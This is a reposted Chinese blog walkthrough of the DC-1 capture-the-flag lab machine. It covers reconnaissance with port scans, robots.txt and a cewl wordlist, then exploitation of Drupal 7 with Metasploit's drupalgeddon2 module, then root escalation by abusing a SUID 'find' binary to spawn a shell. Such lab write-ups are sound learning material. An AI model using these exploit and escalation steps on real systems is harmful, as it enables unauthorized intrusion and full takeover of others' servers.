zoukankan
html css js c++ java
DC1
1.收集信息
cms信息 使用的是Drupal的cms
端口信息 开开启了22端口,80端口,111端口
目录信息 扫到敏感目录
http://192.168.0.119/robots.txt
通过cewl收集敏感信息并生成字典
cewl http://192.168.0.119 -w passwd.txt
2.漏洞分析与利用
通过robots.txt查看敏感目录内容获取中重要信息
可以从uprgade.txt看出,使用的cms是版本为7.x的Drupal
搜索相关漏洞
进入msfconsle ——> search Drupal
尝试使用最新的,rank为execllent的payload: exploit/unix/webapp/drupal_drupalgeddon2
使用该payload后查看目标是否在可攻击版本范围内
设置攻击目标,得到session会话
3.尝试提权
内核作为最后杀招不得已再用。首先联想到常见几种提权方式,suid提权
python -c 'import pty;pty.spawn("/bin/bash")' #利用python的pty获得一个完整的tty
find / -perm -u=s -type f 2>/dev/null #将有suid权限的打印出来
发现常用于usid提权的工具find
cd /tmp #切换到tmp目录下
touch luojun #创建lj文件
find luojun -exec "whoami" ; #查询lj文件并执行whoami命令
成功发现执行命令的是root权限
find luojun -exec "/bin/bash" ; #将bash的shell反弹出来,发现失败了
find luojun -exec "/bin/sh" ; #将sh的shell反弹出来,发现成功,获得root权限
提权成功,接下来任意妄为寻找flag
查看全文
相关阅读:
Bloom Filter(布隆过滤器)的概念和原理
[转]模式匹配的KMP算法详解
字符串搜索算法
一个10转14进制的代码(写的很巧)
几个优秀的js框架的license问题,付费,版权,侵权(extj,jquery,YUI,coolite)
mysql时间戳转成常用可读时间格式方法两种
单件模式(Singleton Pattern)
建造者模式(Builder Pattern)
[转]U盘隐藏文件恢复程序+源码
[转载]内存分配 知识,全局,局部,静态变量
原文地址:https://www.cnblogs.com/sup3rman/p/12389296.html
最新文章
.net创建Com组件(可在C++中引用)(整理) 中庸
ThinkPHP关于分页的使用
TP常用的系统常量
ThinkPHP文件上传类的使用
社交网站邀请注册的设计体验
ThinkPHP怎样在模板进行判断?
压缩JS和CSS常用的工具
使用Xdebug调试PHP程序
如何让制定的计划实施起来
页面右上角效果
热门文章
AC自动机算法详解
一个值得思考的现象
在ThinkSNS上面扩展ThinkPHP的分页类
高并发高流量网站架构
HTML5开发者需要了解的技巧和工具汇总
jQuery获得radio的值
THinkPHP上面关于图片上传类的使用
使用Log4P调试PHP程序
推荐10款非常优秀的HTML5开发工具
如何在ThinkSNS中添加新的应用
Copyright © 2011-2022 走看看